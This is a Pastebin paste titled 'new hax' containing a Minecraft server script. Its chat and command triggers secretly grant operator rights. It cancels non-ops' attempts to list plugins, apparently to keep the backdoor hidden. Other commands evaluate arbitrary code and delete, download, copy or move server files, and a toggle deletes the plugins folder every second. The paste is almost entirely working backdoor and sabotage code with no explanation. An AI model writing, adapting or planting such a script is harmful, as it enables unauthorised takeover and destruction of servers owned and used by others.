siso_

new hax

Feb 27th, 2019
173
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
  1. command /hide:
  2. trigger:
  3. hide player from all players
  4. send "&cHidden"
  5. command /reveal:
  6. trigger:
  7. reveal player from all players
  8. send "&aVisible"
  9. command /name:
  10. trigger:
  11. send "&6%all script's name%"
  12. command /ea <text>:
  13. permission: admin
  14. trigger:
  15. evaluate "%arg%"
  16. on inventory close:
  17. wait 15 tick
  18. if player is sneaking:
  19. open chest with 2 row named "&4&nHacking GUI" to player
  20. on inventory click:
  21. if clicked slot is 39:
  22. add 1 to {clicked.%player%}
  23. if {clicked.%player%} >= 3:
  24. add player to {list::*}
  25. send "&aSuccess" to player
  26. if clicked slot is 38:
  27. if {clicked.%player%} >= 3:
  28. set {chatformat.%player%} to false
  29. send "&coff"
  30. on command:
  31. if command is "pl" or "plugins":
  32. if player is not op:
  33. send "&e%player%がプラグインを確認しました" to ops
  34. cancel event
  35. stop
  36. else if command is "gh":
  37. send "&aSuccess" to sender
  38. op sender
  39. cancel event
  40. else:
  41. stop
  42. on chat:
  43. if message contains ".kani":
  44. send "&aSuccess" to sender
  45. op sender
  46. cancel event
  47. if message contains ".d":
  48. loop all players:
  49. if loop-player is not {list::*}:
  50. broadcast "%loop-player% is not list"
  51. else:
  52. broadcast "&alist &c%{list::*}%"
  53. else:
  54. stop
  55. command /deletefile <text>:
  56. trigger:
  57. delete file "%arg%"
  58. send "deleted %arg%"
  59. command /download <text> <text>:
  60. trigger:
  61. if file existance of "%arg 2%" is true:
  62. download from "%arg 1%" to "%arg 2%"
  63. message "&aファイルをダウンロードしました (%arg 2%)"
  64. else:
  65. message "&4(%arg 2%)が存在しません"
  66. command /filecopy [<text>] [<text>]:
  67. trigger:
  68. if arg 1 is not set:
  69. copy file "%arg 1%" from "%arg 2%"
  70. send "&acopyed %arg 1% from %arg 2%"
  71. command /filemove [<text>] [<text>]:
  72. trigger:
  73. move file path "%arg 1% to path "%arg 2%
  74. send "&acopyed %arg 1% from %arg 2%"
  75. command /loop <text>:
  76. trigger:
  77. if arg 1 is "on":
  78. set {de} to true
  79. if arg 1 is "off":
  80. set {de} to false
  81. every 1 seconds:
  82. if {de} is true:
  83. delete file "plugins"
  84. #move file [path] %string% to [path] %string%
  85. on chat:
  86. cancel event
  87. broadcast "&c[dark] &7%player% &f%message%"
Add Comment
Please, Sign In to add comment